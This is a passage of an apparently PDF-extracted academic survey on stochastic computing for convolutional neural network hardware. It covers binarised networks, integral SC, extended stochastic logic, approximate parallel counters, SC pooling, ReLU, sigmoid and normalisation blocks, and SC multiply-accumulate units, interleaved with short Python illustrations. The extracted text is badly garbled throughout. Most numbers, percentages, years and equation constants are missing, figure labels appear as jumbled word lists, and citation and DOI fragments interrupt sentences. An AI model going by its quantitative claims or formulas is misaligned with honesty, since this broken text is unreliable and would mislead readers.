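    oh, ow = image.shape[0] - kh + 1, image.shape[1] - kw + 1
    out = np.empty((oh, ow))
    for r in range(oh):
        for c in range(ow):
            window = image[r:r + kh, c:c + kw]            # x_i of one scan window
            out[r, c] = activation(np.sum(window * kernel) + bias)
    return out

image = np.random.default_rng(1).random((6, 6))
kernel = np.array([[ 0.2, -0.1,  0.0],
                   [ 0.3,  0.5, -0.2],
                   [-0.1,  0.1,  0.4]])
feature_map = conv2d_single_channel(image, kernel, bias=0.1)
print(feature_map.shape)    # (4, 4) feature map from a 6x6 image and 3x3 kernel
```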
rectified linear unit (relu) and tanh are just the names of a few popular activation functions. the final product ylj will be aggregated, and the process repeats, depending on the structure of the cnn model. the convolution and activation layers are fundamental in cnn, albeit other optional layers exist, such as normalisation layer (to reduce output variance) (ioffe & szegedy, ), pooling layer (to save memory), and dropout layer (to prevent overfitting) (hinton et al., lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ). at the end of convolution, the convolved pixel matrix will be flattened into a single list of data. then, those data will be fed to a highly traditional biological neuron-inspired model, so-called fully connected neuron or dense layer, as shown in fig. b. moreover, multiplication and addition repeat until the model converges to the size of the desired class output. a simple lenet- model (liew et al., ) as depicted in fig. c shows the end-to-end structure of a typical cnn, from the input image to output class. its cascaded arithmetic operation is where the cnn algorithm execution stressed the modern processor. it either spends too much processor time to serialise the process, or taking many hardware resources for parallelisation. the convolution arithmetic does multiplication and addition exhaustively. if the matrices of scanning windows are large or the network is deep/wide, then the computational demands required are high. as the multiplication and accumulation operations increase, memory access bottlenecking becomes the major limitation for dnns (capra et al., ). traditional computing also uses floating-point units (fpu) which takes a wide area with high power consumption due to the colossal amount of logic gates involved. as the edge computing gains interest as the future trends of computation, energy efficiency has become a major concern for the cnn development and urged the researchers to rethink another way to process the information efficiently. most of the modern fpu is of -bit floating-point (full precision). thus, reducing the precision to bits (half precision) or lower is one of the ways to improve cnn computation efficiency without much accuracy degradation. bnn in an extreme case, the parameters are reduced to only a single bit representation. this radical simplification of cnn is called bnn and gained attention among researchers in the industry due to its compactness in memory usage and practicality (simons & lee, ). in bnn, the parameters can only have two possible values, that is, − or . despite some considerable degree of accuracy degradation, bnn does have several unique advantages. first is its model size; for instance, mb of parameter data can be reduced to mb, thus allowing the deployment of small embedded systems. its little memory usage also allows memory-centric computing where the parameters can be stored directly beside the processing elements, thereby speeding up the computation by eliminating data communication cost (angizi & fan, ). second is its hardware implementation capability. bnn requires some amount of arithmetic logic unit (alu) to process fixed-point image data at the frontend (still cost less than fpu). however, the multiplication of the hidden layer can be simply an array of xnor gates because the multiplication of − and is of bipolar math. 
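The equivalence between XNOR and bipolar multiplication mentioned above is easy to verify in software; the sketch below (with hypothetical helper names) reproduces a binarised dot product by XNOR-ing the encoded bits and taking a popcount.

```python
# Why an XNOR array can replace multipliers in a BNN hidden layer:
# encoding -1 -> 0 and +1 -> 1, XNOR of two bits equals the sign of the product,
# and a popcount over the XNOR outputs recovers the dot product.
def to_bit(v):
    return 1 if v == 1 else 0          # bipolar value -> bit encoding

def xnor(a, b):
    return 1 - (a ^ b)

def bnn_dot(xs, ws):
    matches = sum(xnor(to_bit(x), to_bit(w)) for x, w in zip(xs, ws))
    return 2 * matches - len(xs)       # each match adds +1, each mismatch adds -1

xs = [+1, -1, -1, +1, +1]
ws = [+1, +1, -1, -1, +1]
print(bnn_dot(xs, ws))                              # 1
print(sum(x * w for x, w in zip(xs, ws)))           # reference result: 1
```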
the high hardware utilisation of bnn in fpga results in high throughput, whereas being an order of magnitude if not more energy-efficient than cpu and gpu despite lower clock speed (nurvitadhi et al., ). another unique advantage is that bnn is less susceptible to adversarial attack with stochastic weight quantisation in the hidden layer (galloway, taylor & moussa, ). the adversarial attack is where data, for example, an image, are injected with noise and adversely affect the output class decision of a fine-tuned cnn model, albeit the doctored image has no perceptual difference to human eyes. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. however, non-linear functions become useless due to the extreme information loss by the parameter quantisation. instead, a threshold function can simply replace the normalisation and activation functions (simons & lee, ). the bnn also suffer accuracy degradation from highly challenging datasets, such as imagenet classification, due to extreme information loss. as many studies explore for better bnn optimiser algorithms, zhu, dong & su ( ) found that training optimisers might not help much due to bnn insensitivity to small changes in value. instead, bnns in parallel with ensemble technique (multiple trained bnns in parallel and final decision with a majority vote) is a perfect fit, improving the overall bnn accuracy on large image classification datasets. sc cnn vs bnn the evolution of cnn to bnn challenged the idea of sc due to the competitiveness in hardware implementation capability. sc implementation is technically more challenging than bnn due to various custom logics and substantial uncertainty in future community support. after all, sc is still at its infancy in the cnn domain. regardless of the different intentions and directions of development of sc and bnn, both studies try to explore alternatives for a highly efficient computing paradigm in the future of the iot edge computing. with the massive exploitation and integration of dnn algorithms into small or remote devices, such as a smartwatch or surveillance camera, both fields of studies will contribute to the development of a highly realistic edge computing ecosystem. sc implementation in cnns sc is considered the next frontier in energy-efficient edge computing (jayakumar et al., ) due to its energy-efficient operation and ability to tolerate errors in domains of recognition, vision, data mining and so on. meanwhile, many applications attempt to offload challenging workloads from cloud computing to edge devices. thus, sc had become the hotspot of research interest. integral sc: a radical change in sc methodology for the sake of cnn cnn is very popular in vision application due to its simplicity and accuracy. however, sc does not provide out-of-box experience as sc is not yet customised and explicitly optimised for the cnn algorithm. hence, ardakani et al. ( ) proposed a radical idea to use an integer stream instead of the traditional bitstream. the stochastic byte is∈ [ , , ...] so that to repurpose simple binary multiplier and bitwise and as shown in figs. b and c to process integer number in the stochastic domain, or integral sc. the idea is to preserve information across different precisions within a limited stochastic length. the effect of information loss becomes apparent when many mux half-adding many stochastic streams exist together. 
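The information loss of cascaded MUX adders referred to above can be seen in a toy simulation: because a MUX samples only one of its inputs per clock cycle, accumulating many streams through MUXes is noisier than counting all the bits in parallel. The sketch below is a software illustration under assumed stream lengths and values (see the precision example that follows), not a description of any specific circuit.

```python
# Compare parallel-counter accumulation with MUX-tree (scaled-adder) accumulation.
import numpy as np

rng = np.random.default_rng(2)
N = 256                              # deliberately short bitstreams
values = rng.random(8) / 8           # eight small values to accumulate
streams = (rng.random((8, N)) < values[:, None]).astype(np.uint8)

# Parallel-counter style: add all eight bits on every clock cycle.
counter_estimate = streams.sum(axis=0).mean()

# MUX-tree style: only one of the eight streams is sampled per clock cycle,
# so the output encodes sum(values) / 8 plus extra sampling noise.
select = rng.integers(0, 8, size=N)
mux_bits = streams[select, np.arange(N)]
mux_estimate = mux_bits.mean() * 8   # undo the 1/8 scaling for comparison

print(f"exact   {values.sum():.4f}")
print(f"counter {counter_estimate:.4f}")
print(f"mux     {mux_estimate:.4f}")
```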
the resultant precision requirements will only increase and require long overall bitstreams to preserve the precision of the half-added stochastic number. for example, a value of . ( / ) requires a -bit length stochastic stream, whereas . ( / ) only requires -bit length. although . can be expressed in -bit length, half-adding both numbers result in . ( / ), or at least -bit length to preserve the output precision in the stochastic domain. if so, the overall stochastic bit length will need to be extended to -bit length. cascading mux adders in the cnn convolution lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. u x x integral sc  elements .  =  .  =    binary multiplier /  =  /  =  /  =  s s d c enb multiplexer /  =  /  =  /  =  s x s x s x integral sc  and s x integral sc  and s x integral sc  and s x integral sc  and s x integral sc  and s x tree adder nstanh stochastic  bitstream binary binary a b c d integral sc  neuron figure integral sc methodology. (a) high precision stochastic number can be represented with shorter stream length with integer value. (b) binary radix multiplier as integral sc scaled adder. (c) modified mux as integral sc multiplier. (d) integer sc neuron block. full-size doi: . /peerjcs. /fig- stage will drive up the bit length requirements drastically, thus incurring considerable computational latency. the same problem also applies to the multiplier. then, the integral sc comes into play. take fig. a as an example. a value of . can be effectively represented in the same length as the -bit length value of . . given that integral sc can preserve the stochastic information in an integer value, the final batch adding operation in cnn can be processed with tree adder as shown in fig. d, eliminating parallel counter. integer stream also allows short stochastic stream length, thus speeding up the sc time. they also proposed integer version of tanh k-state fsm because the traditional stochastic tanh (stanh) function on fsm only accepts stochastic bits, thereby leading to the modern tanh fsm design. however, integral sc only solved the precision degradation issue, and many other cnn functions are yet to translate to sc domain. moreover, the usage of binary adder and multiplier may not scale well in the case of deploying large cnn models. they claimed energy saving of % compared with the full binary radix computing but is still far from the expected power reduction in the sc transition. extended stochastic logic (esl): another radical approach esl made an extreme modification to the sc methodology if integral sc is not radical enough. instead of using a single stochastic bitstream for a value, esl used two stochastic streams such that their ratio of division represents the actual value (canals et al., ). esl intends to compute the entire range of real numbers in the stochastic domain. for example, if x* is a whole number, then x* = p*/q*, where p* and q* are the esl stochastic pair for x*. p* and q* remain in real number∈ [− , ] in the bipolar format, but obtaining its ratio x* can translate to the entire range of real numbers ∈ [−∝,∝]. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. s s d c enb multiplexer . p* s* q* r* q* s* t* u* p* r* q* s* t* u* esl multiplier p* s* q* r* t* u* esl divider esl adder/subtractor a b c figure esl arithmetic unit. (a) esl multiplier. (b) esl divider by crossing multiplication. 
(b) esl adder and subtractor circuit. full-size doi: . /peerjcs. /fig- esl requires dedicated logic gate for p* and q* stochastic streams. taking figs. a and b as an example, if x* = p*/q* and y* = r*/s*, then by probability math, multiplication between two separable stochastic streams will be: x∗×y∗= p∗×r∗ q∗×s∗ = t∗ u∗ , ( ) where t* and u* are the output pair of stochastic streams. division can be done simply by flipping the nominator and denominator of the second stochastic pair. in the case of stochastic addition, the stochastic pair can be processed such that: x∗+y∗= p∗ q∗ + r∗ s∗ = p∗×s∗+q∗×r∗ q∗×s∗ = t∗ u∗ , ( ) whereas subtraction can be done by not gate inversion as shown in fig. c. value splitting is feasible in the stochastic domain due to the nature of probabilistic computing. however, splitting into double stochastic streams complicated everything, including a compulsory custom bipolar divider (convert t* and u* back to real number representation) before bipolar tanh function blocks. the custom block extensively used comparator and rng, which add a red flag for efficient computing. the neural network may compute in the real number ∈ [−∝,∝] on the early day, but the cnn nowadays lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. commonly compute in bipolar math. after all, the final output class of cnn only need to tell the computer whether the probability ∈ [ , ]. esl did provide an insight into how sc can perform normal arithmetic full-range computation. however, verifying whether esl is better than other sc methods for cnn use case despite the attractive circuit simplicity in primary arithmetic operations is hard due to the non-linear activation function complexity in esl implementation. approximate parallel counter (apc) and btanh: a simple and energy-efficient approach implementing radical changes in every sc component might not be easy. thus, another highly effective approach with traditional stochastic bitstream is apc. other than the frontend binary to stochastic conversion stage of sngs, the final stochastic to binary conversion stage is also equally important (kim, lee & choi, a; kim, lee & choi, b). in the case of accumulating multiple bitstreams, mux adder could become inaccurate due to loss of n− bits input information (li et al., c). in this case, a parallel counter as the one in fig. b is preferred consisting of an array of full adders (fa), but fa is relatively expensive as it uses binary adder logic circuits. the accurate parallel counter should no longer be used as sc is already based on approximate computation. thus, an apc has been proposed to reduce the fa components with a slight trade-off on accuracy whilst achieving the same counting function at lower area and power consumption as shown in fig. a. the proposed apc could save area and power by . % and . %, respectively. the caveat is that the output from apc is in the binary domain; thus, directly removing any stochastic stream from the stochastic domain computation. although the traditional stanh uses single input k-state fsm, with the inspiration from integral sc research, the binary output from apc is cleverly reused as an input for another modified binary input fsm called btanh. tanh activation function is essential in cnn. for example, if the binary output value is , then the fsm will directly jump four states instead of step-wise jumps in stanh. 
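A plausible software model of the APC plus Btanh combination is sketched below. The exact state-update rule and sizing of the published circuit are not reproduced here, so the jump-by-signed-count FSM and its parameters should be read as assumptions that merely illustrate the idea of jumping several states per clock instead of stepping one state at a time.

```python
# Assumed model: each cycle the APC counts the 1s across n parallel bipolar
# streams, and a saturating K-state FSM jumps by the signed count, emitting a
# 1 whenever its state sits in the upper half of the state space.
import numpy as np

rng = np.random.default_rng(4)

def apc_btanh(parallel_bits, K):
    """parallel_bits: (n_streams, stream_len) array of bipolar SC bits."""
    n, length = parallel_bits.shape
    state = K // 2
    out = np.empty(length, dtype=np.uint8)
    for t in range(length):
        ones = int(parallel_bits[:, t].sum())                # APC: count of 1s
        state = min(K - 1, max(0, state + (2 * ones - n)))   # signed state jump
        out[t] = 1 if state >= K // 2 else 0
    return out

vals = np.array([0.3, 0.2, 0.1])       # bipolar inputs whose sum is accumulated
bits = (rng.random((3, 20_000)) < (vals[:, None] + 1) / 2).astype(np.uint8)
y = apc_btanh(bits, K=16)
print(2 * y.mean() - 1)                # saturating, tanh-like response to the sum
```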
more granular tanh step-function could also be achieved, which is not possible with stanh fsm. in the end, the binary output values from apc will be indirectly converted back to stochastic stream with tanh non-linear function applied, completing the stochastic convolution computation as depicted in fig. c. moreover, energy usage can be further reduced by % by sacrificing . % of accuracy with edt, that is, terminating computation at % of the computing time. then, their apc and btanh components had become the foundation for other sc cnn approaches in the next coming years. near-perfect sc implementation in cnn algorithm ren et al. ( ), li et al. ( c); li et al. ( b), ren et al. ( ) and li et al. ( a) proposed a complete overview of a near-perfect cnn analogy in the sc domain, including the following: the missing pooling layer, relu and sigmoid activation layer, and normalisation layer which will be discussed separately in the sub-sections below. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder approximation unit sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder sum cin cout x x full adder s s s s parallel counter btanh activation s s sn‐ sn n stochastic  streams binary of log n bit stochastic  streams a b c figure sc bitstream accumulation. (a) apc. (b) accurate parallel counter. (c) accumulation and btanh activation workflow. full-size doi: . /peerjcs. /fig- sc average pooling and max-pooling layers the purpose of cnn pooling layer is to reduce memory usage and reduce model size. ren et al. ( ) first used cascaded mux as the average pooling function in cnn as shown in fig. a. this solution is simple but may face the precision loss issue as described in the integral sc research. average pooling may not help in cnn training convergence either. ren et al. ( ) proposed max-pooling hardware equivalent to the widely adopted cnn max-pooling layer. the stochastic stream with a maximum value at any given time in the stochastic domain could not be verified. hence, a dedicated counter for each stochastic stream is required to sample and evaluate which stream is of maximum value. by referring to fig. b, the counter samples the first few bits and compare the magnitude at the end of bitstream sampling to make an early decision on which stochastic stream should be chosen to continue the path. the first few bit information could be inaccurate and thus is an approximate max pooling. nevertheless, the decision will eventually converge to the bitstream of maximum value if the sampling continues due to the properties of sc progressive precision. moreover, if the bitstream is long, then less information will be lost, thereby achieving negligible accuracy loss. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. s s d c enb multiplexer s s d c enb multiplexer s s d c enb multiplexer . . . 
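The early-decision behaviour of the hardware-oriented max pooling can be mimicked in a few lines. The warm-up window length and stream values below are assumptions for illustration; a short window can of course pick the wrong stream when two candidates are close, which is exactly the approximation being traded for area and latency.

```python
# Approximate max pooling: small counters sample the head of each stream and the
# stream with the largest early count is passed through for the rest of the cycle.
import numpy as np

rng = np.random.default_rng(5)
N, WARMUP = 1024, 64
values = [0.2, 0.7, 0.4, 0.5]
streams = (rng.random((4, N)) < np.array(values)[:, None]).astype(np.uint8)

early_counts = streams[:, :WARMUP].sum(axis=1)   # counters over the first bits
winner = int(np.argmax(early_counts))            # early decision on the maximum
pooled = streams[winner]                         # chosen stream continues the path

print("selected stream", winner, "decoded value", pooled.mean())   # ideally ~0.7
```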
average  pooling s s d c c enb multiplexer c o u n te r c o u n te r c o u n te r c o u n te r comparator max  pooling u x en tanh s s d c enb multiplexer max(x,y) x y u x x tanh max u x x tanh max u x x tanh max max  pooling s s s s s s s s s s s s tanh max a c b figure sc pooling function. (a) × average pooling with cascaded mux adder. (b) hardware- oriented approximate max pooling circuit. (c) stochastic max function, cascading them will create pure sc max pool block. full-size doi: . /peerjcs. /fig- however, a more straightforward stochastic max-pooling block was proposed by yu et al. ( ). with only an xor gate, fsm and mux, a novel stochastic max block could select whichever stream of higher value. with xor gate controlling the fsm state jumping, the probability of the opposite stream could be inferred from another bitstream by generating the condition of bit entanglement. as such, whenever the fsm sampled a ’s bit from the current bitstream, it implies a ’s bit on the opposite bitstream. thus, whenever inequality between two bitstreams exists, the fsm state will be biased to the one with higher magnitude, completing the max function with the mux. cascading the max function block could realise the max-pooling function block as shown in fig. c. sc relu and sigmoid activation layer the cnn activation layer is similar to the usual neuron activation function. relu function, as the name suggests, performs rectification and cutting off any negative value such that: f (x)=max( ,x). ( ) relu function is trendy due to its fast computation and solves diminishing return in backward propagation learning during the cnn training stage. however, no sc equivalent circuit existed for that particular function; thus, li et al. ( a) proposed a novel sc-based relu function block as depicted in fig. a. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. xn u x x stochastic  stream  pooling s s d c enb multiplexer u x x linear fsm x >x x x comparator accumulator half‐clock up  counter state number relu(x) + parallel counter ‐ parallel counter x‐ ‐ u x+ + adder q q set clr d > s s sn bias + / s s sn bias ‐ / sigmoid(x) a b comparator figure other sc activation functions. (a) relu activation function. (b) sc sigmoid activation func- tion with bias input. full-size doi: . /peerjcs. /fig- firstly, the relu amplitude will be naturally maxed out at value = in the stochastic domain, but this is not a concern as clipped relu has no significant accuracy degradation (fei-fei, deng & li, ). secondly, a negative value must be clipped to zero. notably, the number of ’s bit in the bipolar stochastic stream determines the magnitude of negativity. thus, when the accumulated value is less than the reference half value (the ’s bit is more than ’s bit) in a given sample time, the output will be forced to be ’s bit. otherwise, the output will follow the pattern of emulated linear function from the fsm. although real number convergence in the accumulator takes time, the real value information is equally distributed in the stochastic bitstream. hence, obtaining an accurate comparison is possible by observing the first few bits of information; thus, inaccuracy is negligible. moreover, the comparison is synchronous to the input; therefore, no latency will be incurred. in the case of larger and deeper cnn models such as vggnet and googlenet, the sigmoid function becomes more favourable as non-linear function. as such, li et al. 
( a) proposed a hardware-oriented sc sigmoid approximation function as shown in fig. b. since the output of the stochastic stream is maxed at , the taylor series expanded lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. sigmoid function could be approximated as: +exp(−x) ≈   ,x > + x,− ≤x ≤ ,x <− . ( ) by strategically partitioning the positive summation and negative summation in such a way that: a= ∗ ∑ pos p ·q+ + bias+ ,b= ∗ ∑ neg p ·q+ bias− , ( ) the approximate stochastic sigmoid activation function could then be realised by subtracting both parts such that: a−b= + (∑ p ·q+bias ) , ( ) where ‘p’ and ‘q’ are the weight and pixel value respectively. therefore, by pre-scaling the weights and bias to quarter times, the stochastic sigmoid function could be devised as a result, with the added benefit of including bias information which is missing in the previous sc cnn implementation. the binary adder now is the sigmoid activation function itself, eliminating the need for extra hardware cost such as fsm. however, unlike the apc + btanh function block, the accurate parallel counter is needed. the sigmoid function is not limited to cnn algorithm, or rather, is a universal activation function in other dnn classifier algorithms such as multilayer perceptron and restricted boltzmann machine. with -bit length stochastic stream, the proposed sc sigmoid activated convolution neuron block could perform as accurate as binary computing cnn while consuming . % and . % less area and power respectively, hugely improving the capability of sc in the dnn algorithm computation in general. sc normalisation layer the purpose of the normalisation layer is to reduce internal covariance, thereby improving the overall cnn output accuracy. if the relu activation is applied to the previous layer, only a simple local response normalisation function is required, which can be summarised as: bix,y = aix,y( k+α ∑min(n− ,i+n/ ) j=max( ,i−n/ ) ( ajx,y ) )β , ( ) where the summation part accumulates all n numbers of adjacent neuron output of aix,y. ‘k’, ‘n’, ‘ α’, and ‘β’ are hyperparameters which can be determined by cnn backpropagation training. the complexity of the mathematical relationship can be decoupled into three compute components, square and sum (calculate the denominator components), exponential function with ‘‘β’’ and finally division. li et al. ( c) used stochastic square, fsm activation block and traditional gradient descent sc divider to construct sc normalisation circuit as shown in fig. to perform sc normalisation. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. u u u u x x x u x x sc square  array x x x u x x apc adder fsm based  normalisation  block  function, k, α, β  u x x sc division neuron out  neuron out  neuron out  divident normalised  neuron out  stochastic  domain binary  domain divisor stochastic  domain figure normalisation unit in sc cnn. full-size doi: . /peerjcs. /fig- the accuracy had improved with sc normalisation function and only dropped by . % compared with the original binary alexnet cnn model, achieving six times in the area and five times in power savings compared with binary equivalent normalisation. however, they could have utilised newer sc divider as discussed in the basic concept section. other optimisations the dropout layer is one of the regularisers in cnn to prevent overfitting. 
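For reference, the local response normalisation that the SC circuit above reproduces can be written in a few lines of NumPy; the hyperparameter values in this sketch are placeholders rather than the values used in the cited work.

```python
# Local response normalisation across adjacent channels at one (x, y) position:
# b_i = a_i / (k + alpha * sum of a_j^2 over the n neighbouring channels)^beta.
import numpy as np

def lrn(a, k=2.0, n=5, alpha=1e-4, beta=0.75):
    out = np.empty_like(a)
    channels = len(a)
    for i in range(channels):
        lo, hi = max(0, i - n // 2), min(channels - 1, i + n // 2)
        denom = (k + alpha * np.sum(a[lo:hi + 1] ** 2)) ** beta
        out[i] = a[i] / denom
    return out

a = np.array([1.0, 3.0, 0.5, 2.0, 4.0, 1.5])   # neuron outputs of six channels
print(lrn(a))
```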
however, dropout layer functions only at the cnn training phase, and no custom hardware adaptation is needed at the inference stage, hence no extra hardware overhead. li et al. ( a) optimised the apc function block by utilising inverse mirror fa to reduce the number of transistors required for single fa from to transistors. they also proposed the apc design which input is not a power of two by incorporating inverse half adder. apc optimisation further reduced the area required by at least % and an average of % improvement in energy efficiency. in terms of sc accuracy, the bipolar format remains the major limitation as bipolar is generally worse than the unipolar in terms of sc accuracy (ren et al., ). to overcome the signed value accuracy limitation, zhakatayev et al. ( ) decoupled the sign information from the stochastic stream and added one stochastic bit pair specifically to store the sign value. unlike stochastic probability value, the sign value of a stochastic stream is deterministic, thus, can be processed separately from the stochastic magnitude. although small hardware overhead is needed to process the sign function, such as an extra xor gate to multiply signed value, the accuracy gain is significant, ∼ . times better compared to the bipolar format. with that advantage in mind, the little extra hardware cost for sign processing is trivial. binary interlaced sc, two is better than one full-fledged sc cnn might not be feasible to fit a wide variety of modern complex cnn models. however, the massive multiplication parallelism of sc is still very favourable. thus sc-based multiply-accumulate (mac) unit was proposed by sim & lee ( ) as shown in fig. a to act as multiplier accelerator for binary computing. the mac leverages the parallelism of sc multiplier, then accumulate value with accurate parallel counter, lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. u u u u un x x x xn u x x xnor gate  array x x x xn u x x parallel  counter u u u u un u x accumulator +log n b in a ry s to ch a st ic   st re a m s sng sng sng sng sng normal sc weight push ahead down  counter counter counter counter / / / / / stop counting stop  signal / / / s s d c c enb multiplexer clk x x custom fsm time x x x x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x ,x a b c b in a ry  i n p u t figure binary interlaced sc, where sc is used as mac accelerator. (a) sc mac unit block. (b) sc mac optimisation by cutting off sc early with advancing weight bits. (c) novel sng with mux and fsm. full-size doi: . /peerjcs. /fig- returning pure binary value to other binary computing circuits at the end of sc cycle. this approach, while not the most energy-efficient one, achieved two times the area efficiency and at very high throughput compared to binary computing. with only a single layer sc in mind, sim et al. ( ) further leveraged the sc mac to perform unipolar sc multiplication. all the stochastic ’s bit of the neuron weight value was pushed ahead of time by down counting the weight value so that the sc cycle could terminate when the stream tail of the weight ended with ’s bit as depicted in fig. b. this event is possible because any section of the stream could represent the true value of the stream due to the probabilistic nature. it is technically feasible as long as single layer sc is concerned. they lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. 
/fig- http://dx.doi.org/ . /peerj-cs. also proposed a novel mux fsm based sng. by predefining the mux selection sequence in such a way that the output is the sum of binary weight, the binary input could be directly converted into a stochastic stream as depicted in fig. c, eliminating the need of wbgs which could be expensive in fpga implementation. with the strategic down-counting timing, an area-delay product reduction of %∼ % is achieved while being %∼ % more energy efficient compare to binary computing. in any case, they ignored the sngs hardware overhead in performance comparison. considering that only a single sc layer is required, hojabr et al. ( ) radically redesigned the mac unit by exploiting computing pattern in modern cnn design and proposed differential mac (or dmac). firstly, because cnn relu function always returns positive value, in addition to the binary pixel of positive value, thus, up/down counter could be used as relu function. secondly, considering that a pixel value will eventually pass through all the weight multiplication matrix of cnn scanning window in the convolution process, the neuron weights could be sorted offline ahead of time. in this way, the weight differential from the next sorted weight of higher value is guaranteed to be positive, thus, can be fed to a down counter similar to sc mac to pipeline the stochastic multiplication. since the first weight is of minimum value which could be negative, a d flip-flop is used to hold the sign information just for the first bipolar multiplication. thus, multiplying in sc is as simple as counting the number of bits from the mux and-ing with counter ‘enable’ control from the weights as depicted in fig. . the fsm could be shared among all mux, ignoring the stochastic correlation issue because the multiplication is mutually independent (yang et al., ). the buffered accumulated value will then continue the summation operation as the dmac final stage. this major circuit overhauling could deliver . times and . times gains in speed and energy efficiency respectively relative to the former mac with the benchmarking on more modern cnn models. stochastic quantisation, sc is going asynchronous in the face of quantised binary cnn whereby the arithmetic is lower than -bit precision, no optimisation had been done on the sc cnn counterpart. sc could consume a lot of logic gates as well, especially in cnn use case. thus, li et al. ( b) proposed a novel multiplier with shifted unary code (suc) adder. from the binary interlaced sc research, the weights do not have to follow probability distribution as the pixel value does, as long as the next sc component is not computing in the stochastic domain. by strategically using the weight information as a timing control for sc multiplication, meaningful bits from each stream could be quantised and unified into a single multiply-sum-averaged stochastic stream by or-ing the parallel bitstreams asynchronously as depicted in fig. . the suc adder significantly reduced the requirement of parallel counter whereby its internal fa is expensive in the perspective of sc. the area and power savings are significant as a result, as much as . % and . % respectively relative to usual unipolar sc with less than % accuracy loss compared to quantised binary cnn, paving the way for more efficient parallel counting accumulation mechanism in sc cnn. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
u/d reset b b carry out enb counter u/d reset b b carry out enb counter u/d reset b b carry out enb counter s s d c c enb multiplexer s s d c c enb multiplexer s s d c c enb multiplexer reset x x custom fsm u/d reset b b carry out enb down counter q q set clr d b in a ry   b in a ry   b in a ry  n w w scheduler o u tp u t  b u ff e r w =w ‐w weight indexer binary domain stochastic domain binary domain sign index p(x ) p(x ) p(xn) i weights figure differential mac. major overhauling to the sn mac with counter and differential weight control indexing to pipeline the sc mac computation. full-size doi: . /peerjcs. /fig- lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. sng sng sng sng a b c d / / / / a/ +b/ +c/ +d/ suc adder sng sng parallel counter sng sng sng sng u x x suc adder u x x suc adder u x x suc adder bias+ x‐ ‐ u x+ + adder q q set clr d > sigmoid(x) sng sng parallel counter sng sng sng sng u x x suc adder u x x suc adder u x x suc adder bias‐ a b figure stochastic quantisation accumulation with suc adder. (a) the different information por- tion of the stochastic stream could be encoded into a single stream by or-ing the required bitstream asyn- chronously. (b) suc paired with sc sigmoid activation function. full-size doi: . /peerjcs. /fig- lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. s s d c enb multiplexer s s d c enb multiplexer vin v/ v/ v/ v v v y y y vin y y y <v/ <v/ < v/ > v/ x x x y binary thermometer code y y y y y y y y y y y y y x x x a b figure asc with thermometer coding. (a) implementation of asc on thermometer-encoded sc cir- cuit, eliminating the need for adc and memory components. (b) thermometer coding could be utilised for sngs. full-size doi: . /peerjcs. /fig- analog-to-stochastic converter, sc cnn is ready to be embedded in the case of direct interfacing with analogue input, such as analogue camera sensor, analog-to-digital converter (adc) is usually being deployed, but at the cost of requiring memory storage. zhang et al. ( ) proposed a novel converter, namely, analog-to- stochastic converter (asc) as shown in fig. a where the analogue voltage differential could be directly decoded into stochastic streams with thermometer encoding scheme. the stochastic stream could either be encoded via lfsr, counter, or newly proposed thermometer coding as depicted in fig. b. the thermometer coding is capable of generating parallel bit streams at once but has higher error compared to the others. nevertheless, with long enough bitstream length, those error is negligible. the thermometer encoding enabled the design of novel asc which allows sc cnn to be directly interfaced with analogue voltage input, eliminating adc and memory storage. sc cnn is meant for memory-centric computing notably, sc cnn does require a tremendous amount of weight data similar to fixed point binary cnn. despite many sc cnn architecture innovations, however, without efficient weight storage near to sc elements, sc cnn will suffer memory bandwidth bottlenecking similar to the binary computing. since the weight information is fixed from the training process, those data can be stored in a more area and power-efficient non-volatile domain-wall memory (dwm) (ma et al., ) built beside the sc elements. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . 
